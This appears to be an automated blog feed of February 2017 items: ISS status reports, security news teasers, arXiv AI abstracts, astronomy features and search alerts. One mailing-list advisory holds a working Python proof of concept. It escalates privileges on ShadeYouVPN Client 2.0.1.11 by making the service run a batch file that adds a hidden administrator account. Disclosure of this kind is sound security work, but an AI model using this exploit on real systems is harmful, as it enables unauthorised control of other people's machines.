(SOLACES) measures the EUV/UV spectrum range (17 nanometers – 220 nanometers) with moderate spectral resolution. SpaceX-10 Preparation:  The crew, along with ground specialists, performed a nominal checkout the COTS UHF Communication Unit (CUCU) system.  Dragon Launch Commit Criteria (LCC) requires two fully functional ISS CUCU equipment strings. CUCU is critical for Relative Global Positioning System (RGPS) navigation and is required for Dragon telemetry and command during final R-bar approach when the Tracking and Data Relay Satellite (TDRS) link may be blocked by ISS structure.  Mobile Servicing System (MSS) Operations:  Overnight the Ground Robotic Controllers will stow the Special Purpose Dexterous Manipulator (SPDM), walk the Space Station Remote Manipulator System (SSRMS) off to Node2 Power Data Grapple Fixture (PDGF) and maneuver SSRMS to the offset grapple park position. Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement HRF Generic Frozen Blood Collection HRF Generic Refrigerated Centrifuge Configuration HRF Generic Refrigerated Centrifuge Spin Conclude RS lighting system audit (SM, MRM1, MRM2, DC1) XF305 Camcorder Setup СНТ25 and СНТ26 cable rerouting and reconnecting HRF Generic Sample MELFI Insertion JEM Airlock Slide Table (ST) Extension to JPM Side Structures and Mechanisms (S&M) JEM ORU Xfer I/F (JOTI) and Robo Ext Leak Locator (RELL) Removal From JEM Airlock Structures and Mechanisms JEM ORU Xfer I/F Robo Ext Leak Locator Assist HRF Generic Urine Collection HRF Generic Sample MELFI Insertion Operations HRF Generic Frozen Blood Collection Conclude Stow HMS Tonometry Test Setup HMS Tonometry Test Small Fine Arm (SFA) Airlock Attachment Mechanism (SAM) installation To JEM Airlock (AL) Slide Table Study of veins in lower extremities Capillary Flow Experiments Interior Corner Flow Procedure Review HMS Tonometry Test Stow Capillary Flow Experiment MWA Preparation Capillary Flow Experiments Hardware Setup Study of veins in lower […]

from ISS On-Orbit Status Report http://ift.tt/2lWgCIa
via IFTTT

News editors back anonymous sources bill

News editors back anonymous sources bill. Senator's private member's bill would help protect identities of journalists' confidential whistleblowers from ...

from Google Alert - anonymous http://ift.tt/2lVv8zV
via IFTTT

Yahoo Hacked Once Again! Quietly Warns Affected Users About New Attack

Has Yahoo rebuilt your trust again? If yes, then you need to think once again, as the company is warning its users of another hack. Last year, Yahoo admitted two of the largest data breaches on record. One of which that took place in 2013 disclosed personal details associated with more than 1 Billion Yahoo user accounts. Well, it's happened yet again. <!-- adsense --> Yahoo sent out another


from The Hacker News http://ift.tt/2lV5kE2
via IFTTT

New MacOS Malware linked to Russian Hackers Can Steal Passwords & iPhone Backups

Security researchers have discovered a new Mac malware allegedly developed by APT28 Russian cyber espionage group who is believed to be responsible for 2016 presidential election hacking scandal. A new variant of the X-Agent spyware is now targeting Apple macOS system that has previously been used in cyber attacks against Windows, iOS, Android, and Linux devices. The malware is designed to


from The Hacker News http://ift.tt/2kVF7Ys
via IFTTT

The Calabash Nebula from Hubble


Fast expanding gas clouds mark the end for a central star in the Calabash Nebula. The once-normal star has run out of nuclear fuel, causing the central regions to contract into a white dwarf. Some of the liberated energy causes the outer envelope of the star to expand. In this case, the result is a photogenic proto-planetary nebula. As the million-kilometer per hour gas rams into the surrounding interstellar gas, a supersonic shock front forms where ionized hydrogen and nitrogen glow blue. Thick gas and dust hide the dying central star. The Calabash Nebula, also known as the Rotten Egg Nebula and OH231.8+4.2, will likely develop into a full bipolar planetary nebula over the next 1000 years. The nebula, featured here, is about 1.4 light-years in extent and located about 5000 light-years away toward the constellation of Puppis. via NASA http://ift.tt/2lKLZtg

August 21, 2017 Total Solar Eclipse Path for Spherical Displays

On Monday, August 21, 2017, the Moon will pass in front of the Sun, casting its shadow across all of North America. This will be the first total solar eclipse visible in the contiguous United States in 38 years. The Moon's shadow can be divided into areas called the umbra and the penumbra. Within the penumbra, the Sun is only partially blocked, and observers experience a partial eclipse. The much smaller umbra lies at the very center of the shadow cone, and anyone there sees the Moon entirely cover the Sun in a total solar eclipse. In the animation, the umbra is the small black oval. The red streak behind this oval is the path of totality. Anyone within this path will see a total eclipse when the umbra passes over them. The much larger shaded bullseye pattern represents the penumbra. Steps in the shading denote different percentages of Sun coverage (eclipse magnitude), at levels of 90, 75, 50 and 25. The yellow and orange contours map the path of the penumbra. The outermost yellow contour is the edge of the penumbra path. Outside this limit, no part of the Sun is covered by the Moon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2ks3Sgr
via IFTTT

Wednesday, February 15, 2017

Community United for Safety and Protection: An anonymous experience relating to HB112

Community United for Safety and Protection: An anonymous experience relating to HB112; documentary to be shown Wednesday evening.

from Google Alert - anonymous http://ift.tt/2kMfirx
via IFTTT

(meme)- Quote from anonymous intelligence community member.

#He Will Die In Jail (meme)- Quote from anonymous intelligence community member. By MickeyMayhem. Wednesday Feb 15, 2017 · 4:07 PM PST.

from Google Alert - anonymous http://ift.tt/2lMYk00
via IFTTT

Entropy Non-increasing Games for the Improvement of Dataflow Programming. (arXiv:1702.04389v1 [cs.AI])

In this article, we introduce a new conception of a family of esport games called Samu Entropy to try to improve dataflow program graphs like the ones that are based on Google's TensorFlow. Currently, the Samu Entropy project specifies only requirements for new esport games to be developed with particular attention to the investigation of the relationship between esport and artificial intelligence. It is quite obvious that there is a very close and natural relationship between esport games and artificial intelligence. Furthermore, the project Samu Entropy focuses not only on using artificial intelligence, but on creating AI in a new way. We present a reference game called Face Battle that implements the Samu Entropy requirements.



from cs.AI updates on arXiv.org http://ift.tt/2llw049
via IFTTT

Efficient Multi-task Feature and Relationship Learning. (arXiv:1702.04423v1 [cs.LG])

In this paper we propose a multi-convex framework for multi-task learning that improves predictions by learning relationships both between tasks and between features. Our framework is a generalization of related methods in multi-task learning, that either learn task relationships, or feature relationships, but not both. We start with a hierarchical Bayesian model, and use the empirical Bayes method to transform the underlying inference problem into a multi-convex optimization problem. We propose a coordinate-wise minimization algorithm that has a closed form solution for each block subproblem. Naively these solutions would be expensive to compute, but by using the theory of doubly stochastic matrices, we are able to reduce the underlying matrix optimization subproblem into a minimum weight perfect matching problem on a complete bipartite graph, and solve it analytically and efficiently. To solve the weight learning subproblem, we propose three different strategies, including a gradient descent method with linear convergence guarantee when the instances are not shared by multiple tasks, and a numerical solution based on Sylvester equation when instances are shared. We demonstrate the efficiency of our method on both synthetic datasets and real-world datasets. Experiments show that the proposed optimization method is orders of magnitude faster than an off-the-shelf projected gradient method, and our model is able to exploit the correlation structures among multiple tasks and features.



from cs.AI updates on arXiv.org http://ift.tt/2kA1oaO
via IFTTT

Frustratingly Short Attention Spans in Neural Language Modeling. (arXiv:1702.04521v1 [cs.CL])

Neural language models predict the next token using a latent representation of the immediate token history. Recently, various methods for augmenting neural language models with an attention mechanism over a differentiable memory have been proposed. For predicting the next token, these models query information from a memory of the recent history which can facilitate learning mid- and long-range dependencies. However, conventional attention mechanisms used in memory-augmented neural language models produce a single output vector per time step. This vector is used both for predicting the next token as well as for the key and value of a differentiable memory of a token history. In this paper, we propose a neural language model with a key-value attention mechanism that outputs separate representations for the key and value of a differentiable memory, as well as for encoding the next-word distribution. This model outperforms existing memory-augmented neural language models on two corpora. Yet, we found that our method mainly utilizes a memory of the five most recent output representations. This led to the unexpected main finding that a much simpler model based only on the concatenation of recent output representations from previous time steps is on par with more sophisticated memory-augmented neural language models.



from cs.AI updates on arXiv.org http://ift.tt/2lluUVO
via IFTTT

On the Discrepancy Between Kleinberg's Clustering Axioms and $k$-Means Clustering Algorithm Behavior. (arXiv:1702.04577v1 [cs.LG])

This paper investigates the validity of Kleinberg's axioms for clustering functions with respect to the quite popular clustering algorithm called $k$-means. While Kleinberg's axioms have been discussed heavily in the past, we concentrate here on the case predominantly relevant for $k$-means algorithm, that is behavior embedded in Euclidean space. We point at some contradictions and counter intuitiveness aspects of this axiomatic set within $\mathbb{R}^m$ that were evidently not discussed so far. Our results suggest that apparently without defining clearly what kind of clusters we expect we will not be able to construct a valid axiomatic system. In particular we look at the shape and the gaps between the clusters. Finally we demonstrate that there exist several ways to reconcile the formulation of the axioms with their intended meaning and that under this reformulation the axioms stop to be contradictory and the real-world $k$-means algorithm conforms to this axiomatic system.



from cs.AI updates on arXiv.org http://ift.tt/2kzYkeY
via IFTTT

Developing an ontology for the access to the contents of an archival fonds: the case of the Catasto Gregoriano. (arXiv:1702.04584v1 [cs.AI])

The research was proposed to exploit and extend the relational and contextual nature of the information assets of the Catasto Gregoriano, kept at the Archivio di Stato in Rome. Developed within the MODEUS project (Making Open Data Effectively Usable), this study originates from the following key ideas of MODEUS: to require Open Data to be expressed in terms of an ontology, and to include such an ontology as a documentation of the data themselves. Thus, Open Data are naturally linked by means of the ontology, which meets the requirements of the Linked Open Data vision.



from cs.AI updates on arXiv.org http://ift.tt/2llsEOw
via IFTTT

Local Search for Minimum Weight Dominating Set with Two-Level Configuration Checking and Frequency Based Scoring Function. (arXiv:1702.04594v1 [cs.AI])

The Minimum Weight Dominating Set (MWDS) problem is an important generalization of the Minimum Dominating Set (MDS) problem with extensive applications. This paper proposes a new local search algorithm for the MWDS problem, which is based on two new ideas. The first idea is a heuristic called two-level configuration checking (CC2), which is a new variant of a recent powerful configuration checking strategy (CC) for effectively avoiding the recent search paths. The second idea is a novel scoring function based on the frequency of being uncovered of vertices. Our algorithm is called CC2FS, according to the names of the two ideas. The experimental results show that, CC2FS performs much better than some state-of-the-art algorithms in terms of solution quality on a broad range of MWDS benchmarks.



from cs.AI updates on arXiv.org http://ift.tt/2kA48F3
via IFTTT

Visualizing Deep Neural Network Decisions: Prediction Difference Analysis. (arXiv:1702.04595v1 [cs.CV])

This article presents the prediction difference analysis method for visualizing the response of a deep neural network to a specific input. When classifying images, the method highlights areas in a given input image that provide evidence for or against a certain class. It overcomes several shortcoming of previous methods and provides great additional insight into the decision making process of classifiers. Making neural network decisions interpretable through visualization is important both to improve models and to accelerate the adoption of black-box classifiers in application areas such as medicine. We illustrate the method in experiments on natural images (ImageNet data), as well as medical images (MRI brain scans).



from cs.AI updates on arXiv.org http://ift.tt/2lMWiNq
via IFTTT

A Spacetime Approach to Generalized Cognitive Reasoning in Multi-scale Learning. (arXiv:1702.04638v1 [cs.AI])

In modern machine learning, pattern recognition replaces realtime semantic reasoning. The mapping from input to output is learned with fixed semantics by training outcomes deliberately. This is an expensive and static approach which depends heavily on the availability of a very particular kind of prior raining data to make inferences in a single step. Conventional semantic network approaches, on the other hand, base multi-step reasoning on modal logics and handcrafted ontologies, which are {\em ad hoc}, expensive to construct, and fragile to inconsistency. Both approaches may be enhanced by a hybrid approach, which completely separates reasoning from pattern recognition. In this report, a quasi-linguistic approach to knowledge representation is discussed, motivated by spacetime structure. Tokenized patterns from diverse sources are integrated to build a lightly constrained and approximately scale-free network. This is then be parsed with very simple recursive algorithms to generate `brainstorming' sets of reasoned knowledge.



from cs.AI updates on arXiv.org http://ift.tt/2llBlbw
via IFTTT

Telugu OCR Framework using Deep Learning. (arXiv:1509.05962v2 [stat.ML] UPDATED)

In this paper, we address the task of Optical Character Recognition(OCR) for the Telugu script. We present an end-to-end framework that segments the text image, classifies the characters and extracts lines using a language model. The segmentation is based on mathematical morphology. The classification module, which is the most challenging task of the three, is a deep convolutional neural network. The language is modelled as a third degree markov chain at the glyph level. Telugu script is a complex alphasyllabary and the language is agglutinative, making the problem hard. In this paper we apply the latest advances in neural networks to achieve state-of-the-art error rates. We also review convolutional neural networks in great detail and expound the statistical justification behind the many tricks needed to make Deep Learning work.



from cs.AI updates on arXiv.org http://ift.tt/1KIvpiF
via IFTTT

Optimal Number of Choices in Rating Contexts. (arXiv:1605.06588v5 [cs.AI] UPDATED)

In many settings people must give numerical scores to entities from a small discrete set. For instance, rating physical attractiveness from 1-5 on dating sites, or papers from 1-10 for conference reviewing. We study the problem of understanding when using a different number of options is optimal. For concreteness we assume the true underlying scores are integers from 1-100. We consider the case when scores are uniform random and Gaussian. We study when using 2, 3, 4, 5, and 10 options is optimal in these models. One may expect that using more options would always improve performance in this model, but we show that this is not necessarily the case, and that using fewer choices -- even just two -- can surprisingly be optimal in certain situations. While in theory for this setting it would be optimal to use all 100 options, in practice this is prohibitive, and it is preferable to utilize a smaller number of options due to humans' limited computational resources. Our results suggest that using a smaller number of options than is typical could be optimal in certain situations. This would have many potential applications, as settings requiring entities to be ranked by humans are ubiquitous.



from cs.AI updates on arXiv.org http://ift.tt/1Ua9moh
via IFTTT

Neural Architecture Search with Reinforcement Learning. (arXiv:1611.01578v2 [cs.LG] UPDATED)

Neural networks are powerful and flexible models that work well for many difficult learning tasks in image, speech and natural language understanding. Despite their success, neural networks are still hard to design. In this paper, we use a recurrent network to generate the model descriptions of neural networks and train this RNN with reinforcement learning to maximize the expected accuracy of the generated architectures on a validation set. On the CIFAR-10 dataset, our method, starting from scratch, can design a novel network architecture that rivals the best human-invented architecture in terms of test set accuracy. Our CIFAR-10 model achieves a test error rate of 3.65, which is 0.09 percent better and 1.05x faster than the previous state-of-the-art model that used a similar architectural scheme. On the Penn Treebank dataset, our model can compose a novel recurrent cell that outperforms the widely-used LSTM cell, and other state-of-the-art baselines. Our cell achieves a test set perplexity of 62.4 on the Penn Treebank, which is 3.6 perplexity better than the previous state-of-the-art model. The cell can also be transferred to the character language modeling task on PTB and achieves a state-of-the-art perplexity of 1.214.



from cs.AI updates on arXiv.org http://ift.tt/2eGYtO2
via IFTTT

Learning to Act by Predicting the Future. (arXiv:1611.01779v2 [cs.LG] UPDATED)

We present an approach to sensorimotor control in immersive environments. Our approach utilizes a high-dimensional sensory stream and a lower-dimensional measurement stream. The cotemporal structure of these streams provides a rich supervisory signal, which enables training a sensorimotor control model by interacting with the environment. The model is trained using supervised learning techniques, but without extraneous supervision. It learns to act based on raw sensory input from a complex three-dimensional environment. The presented formulation enables learning without a fixed goal at training time, and pursuing dynamically changing goals at test time. We conduct extensive experiments in three-dimensional simulations based on the classical first-person game Doom. The results demonstrate that the presented approach outperforms sophisticated prior formulations, particularly on challenging tasks. The results also show that trained models successfully generalize across environments and goals. A model trained using the presented approach won the Full Deathmatch track of the Visual Doom AI Competition, which was held in previously unseen environments.



from cs.AI updates on arXiv.org http://ift.tt/2fzg5c7
via IFTTT

Anonymous Alerts® and PNW BOCES Partner to Eliminate Bullying, Drugs, and Safety Issues in All ...

SOURCE Anonymous Alerts, LLC. Putnam Valley CSD is the first school district to take advantage of the new PNW BOCES and Anonymous Alerts® ...

from Google Alert - anonymous http://ift.tt/2kzH3Ct
via IFTTT

Sister Anonymous

Get discount "Sister Anonymous" tickets for Boston Center for the Arts - Plaza Black Box Boston. Goldstar has "Sister Anonymous" reviews, seat ...

from Google Alert - anonymous http://ift.tt/2l973qi
via IFTTT

Sandusky Register Star News

People in 04/10/1948 Obituary Death Notice clipping.

from Google Alert - anonymous http://ift.tt/2kqeHzu
via IFTTT

Kiper Mock Draft 2.0: Ravens take Washington CB Sidney Jones at No. 16; "one of the most polished defenders in the draft" - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 2/14/2017

Transition to (X2) R15 Software:  As part of the R15 software transition, two of the three Command and Control (C&C) Multiplexer/Demultiplexers (MDMs) were transitioned to updated software today. Updates to the C&C MDMs include:  Visiting Vehicle Support Implement modified capability for loading patches Modification to Rapid Depress Auto-Response Dual Integrated Communications Unit (ICU) Capability Increase number of Telemetry Format Versions to meet VV Requirements Improvements to Longeron Shadowing Fault Detection, Isolation and Recovery (FDIR) response Following the C&C transition to CCS R5 the crew replaced the Portable Computer System (PCS) hard drives with new ones.  Tissue Regeneration-Bone Defect Rodent Research-4 (RR-4) Preparations: The crew continued with RR-4 preparation activities prior to SpaceX-10 (SpX-10) planned arrival on Monday, February 20. This morning the crew completed the habitat installation activities, installing Habitats C and D. Telemetry and video were received from both Habitats. The crew also configured the Microgravity Science Glovebox (MSG) Life Science Ancillary Hardware (LSAH) for RR-4 operations. The LSAH provides ability to decontaminate the MSG work volume after execution of any experiment with biological hazards. Both the RR-4 and Microgravity Expanded Stem Cells (MESC) payloads will have their own LSAH configurations within the MSG. Radio Frequency Identification (RFID) Logistics Installation: The crew completed the RFID Logistics installation this morning, configuring antennas in Node 1. This afternoon, they configured the RFID Logistics Readers and Antennas in the Lab. After each installation, the crew photographed the configuration and downlinked for ground team evaluation. The RFID Logisitics experiment aims to utilize RFID enabled tags on hardware throughout the ISS, and assist in the tracking of the hardware as it is moved around the station.  Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Universal Docking Port (UDP): The crew performed the second in a series of test runs for the SPHERES UDP payload. They then loaded the test software and performed the session with ground support staff direction. The objectives of the UDP session are to demonstrate a reliably successful docking through running multiple, repeatable docking maneuvers using both global metrology and docking port cameras; perform joint maneuvers of docked satellites using the thrusters from two satellites to demonstrate controllability; and test an algorithm for docking to a satellite which is tumbling in a slow, known manner. The addition of the Docking Ports is a critical upgrade to the SPHERES facility aboard the ISS. With the new ability to dock and undock, SPHERES provides a test bed to address many of the challenges of combining autonomous spacecraft. Mated spacecraft can assemble complex systems in orbit or combine sensors and actuators for satellite servicing and repurposing missions. The SPHERES-UDP enables testing of complex tasks through optimal and adaptive control, autonomous decision-making processes, and real-time image processing. Today’s Planned Activities All activities were completed unless otherwise noted. Rodent Research Habitat Retrieval Health Maintenance System (HMS) Periodic Health Status (PHS) Evaluation Setup JEM Airlock Press ИК0501 Gas Analyzer О2 readings adjustments Uout= 2.68V. Prep for cable installation and connection to СНТ-25, 26. Periodic Health Status (PHS) Evaluation Radio Frequency Identification Logistics Hardware Gather RODENT RESEARCH. Installation of Habitat Module JEM Airlock Leak Check BIOCARD. Operator Assistance During the Experiment Radio Frequency Identification Logistics Photo of the Crisstal Experiment and Return to Biolab TCU Health Maintenance System (HMS) Periodic Health Status (PHS) Stow Hardware PILOT-T. Preparation for the experiment. Water Resource Management (WRM) Condensate Sample Init RODENT RESEARCH. Installation of Habitat Module Intravehicular Tissue Equivalent Proportional Counter (IV-TEPC) Relocate Formaldehyde Monitoring Kit (FMK) Deployment Operations SPHERES Test Session Setup Grab Sample Container (GSC) Sampling Operations Water Resource Management (WRM) Condensate Sample Terminate HRF Generic Frozen Blood Collection Setup Health Maintenance System (HMS) Vision Test CRYOGEM-03 refrigerator Setup Health Maintenance System (HMS) Vision Questionnaire SPHERES Docking Port Test Run Rodent Research Node 2 Camcorder Video Setup Rodent Research Microgravity Science Glovebox LSAH Setup URAGAN. Observation and photography using Photo Equipment Microbial Sample Collection Recharging Soyuz 732 Samsung PC Battery (if charge level is below 80%) Habitability Human Factors Directed Observations – Subject Audit of Crew Onboard Support Kit (КСПЭ) Equipment PILOT-T. Experiment Ops. Delta file prep Radio Frequency Identification Logistics СОЖ maintenance X2R15 Portable Computer System (PCS) Connect Portable Computer System (PCS) Release 18 Deploy Part 2 Multi Omics FOS Preparation Multi Omics FOS Stow PILOT-T. Closeout Ops. Health Maintenance System (HMS) Vision Test Terminate Soyuz 732 Samsung PC Battery Recharge Health Maintenance System (HMS) Vision Questionnaire  Completed Task List Items Expedition New Earth Video-Radiation Expedition New Earth Video-Sick Bay Ground Activities All activities were completed unless otherwise noted. X2R15 Software transition – C&C MDMs N3 MCA Full Calibration JEM A/L repress and leak check  Three-Day Look Ahead: Wednesday, 02/15: JOTI RELL Removal, SAM Install, RFID Kit Install, Vision test, Glacier Desiccant, PCS R18 P&I, CUCU Activate Thursday, 02/16: Google Street View – Cupola, Dragon OBT, Eye Exams Friday, 02/17: Dragon ROBoT Session, Cubesat Deployer Install QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Standby Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2kSs0ra
via IFTTT

I have a new follower on Twitter


Clearlease Funding
Visit https://t.co/P3qDBpCQIg today get your campaign promoted on Facebook 520,000+ & Twitter to 1,840,000+ Donors, Investors, & Angels
GLOBAL
https://t.co/P3qDBpCQIg
Following: 88082 - Followers: 85324

February 15, 2017 at 07:03AM via Twitter http://twitter.com/Clearlease

Websites Can Now Track You Online Across Multiple Web Browsers

You might be aware of websites, banks, retailers, and advertisers tracking your online activities using different Web "fingerprinting" techniques even in incognito/private mode, but now sites can track you anywhere online — even if you switch browsers. A team of researchers has recently developed a cross-browser fingerprinting technique — the first reliable technique to accurately track users


from The Hacker News http://ift.tt/2kp60Wh
via IFTTT

Signal Messaging App Rolls Out Encrypted Video Calling

WhatsApp and Facebook have so far the largest end-to-end encrypted video calling network of all, but now another popular end-to-end encrypted messaging app recommended by whistleblower Edward Snowden is ready to give them a really tough competition. The Signal app, which is widely considered the most secure of all other encrypted messaging apps, released video calling feature on Tuesday for


from The Hacker News http://ift.tt/2koM3Pf
via IFTTT

[FD] Backdoored Web Application v.1.0.2

Hello participants of Mailing List. In December 2012 I released my Backdoored Web Application (BWA) (http://ift.tt/1mAiFfa) - a reference test of backdoors scanners. All qualitative scanners of backdoors must find it, otherwise such scanners not good enough. So everyone can use it to check their scanners. In 2013 I published the results of my backdoor scanners testing (http://ift.tt/2koJYD1). In this research I tested WordPress plugins scanners with using of my BWA. After release of version BWA v.1.0.1 in 2014, this year I released new version Backdoored Web Application v.1.0.2 (http://ift.tt/2kIPzjD). In which I added new backdoor on PHP. This will allow to better test backdoors scanners. Download: http://ift.tt/2koJvkl Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://ift.tt/1H884q9

Source: Gmail -> IFTTT-> Blogger

[FD] ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

# Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation # Date: 14.02.2017 # Software Link: http://ift.tt/1tmPouT # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: http://ift.tt/2iHZPtU # Category: local 1. Description `ShadeYou` service executes any file path send through socket without verification as SYSTEM user. http://ift.tt/2lLe0wK 2. Proof of Concept import socket import tempfile print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation" print "by Kacper Szurek" print "http://ift.tt/2iHZPtU" print "https://twitter.com/KacperSzurek" t = tempfile.TemporaryFile(delete=False, suffix='.bat') t.write("net user shade /add\n") t.write("net localgroup administrators shade /add") t.close() s = socket.socket() s.connect(("127.0.0.1", 10295)) s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n") print s.recv(1024) print s.recv(1024) 3. Solution Update to version 2.0.1.12

Source: Gmail -> IFTTT-> Blogger

The Rosette Nebula


Would the Rosette Nebula by any other name look as sweet? The bland New General Catalog designation of NGC 2237 doesn't appear to diminish the appearance of this flowery emission nebula. Inside the nebula lies an open cluster of bright young stars designated NGC 2244. These stars formed about four million years ago from the nebular material and their stellar winds are clearing a hole in the nebula's center, insulated by a layer of dust and hot gas. Ultraviolet light from the hot cluster stars causes the surrounding nebula to glow. The Rosette Nebula spans about 100 light-years across, lies about 5000 light-years away, and can be seen with a small telescope towards the constellation of the Unicorn (Monoceros). via NASA http://ift.tt/2ksUEf4

Tuesday, February 14, 2017

Anonymous

Showing 1-24 of 29 results for “Anonymous”. Sorted by date added, Popularity, Relevance, Release date, Title, Author. Filters. Filter search results.

from Google Alert - anonymous http://ift.tt/2l6rnZj
via IFTTT

I have a new follower on Twitter


James Maguire
Tech journalist, managing editor, https://t.co/oemYsgw8XQ - Cloud, Big Data, AI, VR, startups. Omnivorous culture hound. Tweets my own 'til the robots rebel.
SF Bay Area
http://t.co/LvTiSUR3zu
Following: 5767 - Followers: 8616

February 14, 2017 at 10:43PM via Twitter http://twitter.com/JamesMaguire

Data-Intensive Supercomputing in the Cloud: Global Analytics for Satellite Imagery. (arXiv:1702.03935v1 [cs.DC])

We present our experiences using cloud computing to support data-intensive analytics on satellite imagery for commercial applications. Drawing from our background in high-performance computing, we draw parallels between the early days of clustered computing systems and the current state of cloud computing and its potential to disrupt the HPC market. Using our own virtual file system layer on top of cloud remote object storage, we demonstrate aggregate read bandwidth of 230 gigabytes per second using 512 Google Compute Engine (GCE) nodes accessing a USA multi-region standard storage bucket. This figure is comparable to the best HPC storage systems in existence. We also present several of our application results, including the identification of field boundaries in Ukraine, and the generation of a global cloud-free base layer from Landsat imagery.



from cs.AI updates on arXiv.org http://ift.tt/2leWKne
via IFTTT

Constraint Answer Set Solver EZCSP and Why Integration Schemas Matter. (arXiv:1702.04047v1 [cs.AI])

Researchers in answer set programming and constraint programming have spent significant efforts in the development of hybrid languages and solving algorithms combining the strengths of these traditionally separate fields. These efforts resulted in a new research area: constraint answer set programming. Constraint answer set programming languages and systems proved to be successful at providing declarative, yet efficient solutions to problems involving hybrid reasoning tasks. One of the main contributions of this paper is the first comprehensive account of the constraint answer set language and solver EZCSP, a mainstream representative of this research area that has been used in various successful applications. We also develop an extension of the transition systems proposed by Nieuwenhuis et al. in 2006 to capture Boolean satisfiability solvers. We use this extension to describe the EZCSP algorithm and prove formal claims about it. The design and algorithmic details behind EZCSP clearly demonstrate that the development of the hybrid systems of this kind is challenging. Many questions arise when one faces various design choices in an attempt to maximize system's benefits. One of the key decisions that a developer of a hybrid solver makes is settling on a particular integration schema within its implementation. Thus, another important contribution of this paper is a thorough case study based on EZCSP, focused on the various integration schemas that it provides.

Under consideration in Theory and Practice of Logic Programming (TPLP).



from cs.AI updates on arXiv.org http://ift.tt/2lhIglR
via IFTTT

Crossmatching variable objects with the Gaia data. (arXiv:1702.04165v1 [astro-ph.IM])

Tens of millions of new variable objects are expected to be identified in over a billion time series from the Gaia mission. Crossmatching known variable sources with those from Gaia is crucial to incorporate current knowledge, understand how these objects appear in the Gaia data, train supervised classifiers to recognise known classes, and validate the results of the Variability Processing and Analysis Coordination Unit (CU7) within the Gaia Data Analysis and Processing Consortium (DPAC). The method employed by CU7 to crossmatch variables for the first Gaia data release includes a binary classifier to take into account positional uncertainties, proper motion, targeted variability signals, and artefacts present in the early calibration of the Gaia data. Crossmatching with a classifier makes it possible to automate all those decisions which are typically made during visual inspection. The classifier can be trained with objects characterized by a variety of attributes to ensure similarity in multiple dimensions (astrometry, photometry, time-series features), with no need for a-priori transformations to compare different photometric bands, or of predictive models of the motion of objects to compare positions. Other advantages as well as some disadvantages of the method are discussed. Implementation steps from the training to the assessment of the crossmatch classifier and selection of results are described.



from cs.AI updates on arXiv.org http://ift.tt/2kvkleF
via IFTTT

On Detecting Adversarial Perturbations. (arXiv:1702.04267v1 [stat.ML])

Machine learning and deep learning in particular has advanced tremendously on perceptual tasks in recent years. However, it remains vulnerable against adversarial perturbations of the input that have been crafted specifically to fool the system while being quasi-imperceptible to a human. In this work, we propose to augment deep neural networks with a small "detector" subnetwork which is trained on the binary classification task of distinguishing genuine data from data containing adversarial perturbations. Our method is orthogonal to prior work on addressing adversarial perturbations, which has mostly focused on making the classification network itself more robust. We show empirically that adversarial perturbations can be detected surprisingly well even though they are quasi-imperceptible to humans. Moreover, while the detectors have been trained to detect only a specific adversary, they generalize to similar and weaker adversaries. In addition, we propose an adversarial attack that fools both the classifier and the detector and a novel training procedure for the detector that counteracts this attack.



from cs.AI updates on arXiv.org http://ift.tt/2lhwVCx
via IFTTT

DAGER: Deep Age, Gender and Emotion Recognition Using Convolutional Neural Network. (arXiv:1702.04280v1 [cs.CV])

This paper describes the details of Sighthound's fully automated age, gender and emotion recognition system. The backbone of our system consists of several deep convolutional neural networks that are not only computationally inexpensive, but also provide state-of-the-art results on several competitive benchmarks. To power our novel deep networks, we collected large labeled datasets through a semi-supervised pipeline to reduce the annotation effort/time. We tested our system on several public benchmarks and report outstanding results. Our age, gender and emotion recognition models are available to developers through the Sighthound Cloud API at http://ift.tt/1MlcpaD



from cs.AI updates on arXiv.org http://ift.tt/2kvjRWh
via IFTTT

T-SKIRT: Online Estimation of Student Proficiency in an Adaptive Learning System. (arXiv:1702.04282v1 [cs.AI])

We develop T-SKIRT: a temporal, structured-knowledge, IRT-based method for predicting student responses online. By explicitly accounting for student learning and employing a structured, multidimensional representation of student proficiencies, the model outperforms standard IRT-based methods on an online response prediction task when applied to real responses collected from students interacting with diverse pools of educational content.



from cs.AI updates on arXiv.org http://ift.tt/2kveupR
via IFTTT

Bayesian Opponent Exploitation in Imperfect-Information Games. (arXiv:1603.03491v4 [cs.GT] UPDATED)

Two fundamental problems in computational game theory are computing a Nash equilibrium and learning to exploit opponents given observations of their play (opponent exploitation). The latter is perhaps even more important than the former: Nash equilibrium does not have a compelling theoretical justification in game classes other than two-player zero-sum, and for all games one can potentially do better by exploiting perceived weaknesses of the opponent than by following a static equilibrium strategy throughout the match. The natural setting for opponent exploitation is the Bayesian setting where we have a prior model that is integrated with observations to create a posterior opponent model that we respond to. The most natural, and a well-studied prior distribution is the Dirichlet distribution. An exact polynomial-time algorithm is known for best-responding to the posterior distribution for an opponent assuming a Dirichlet prior with multinomial sampling in normal-form games; however, for imperfect-information games the best known algorithm is based on approximating an infinite integral without theoretical guarantees. We present the first exact algorithm for a natural class of imperfect-information games. We demonstrate that our algorithm runs quickly in practice and outperforms the best prior approaches. We also present an algorithm for the uniform prior setting.



from cs.AI updates on arXiv.org http://ift.tt/22ee9sx
via IFTTT

Hadamard Product for Low-rank Bilinear Pooling. (arXiv:1610.04325v3 [cs.CV] UPDATED)

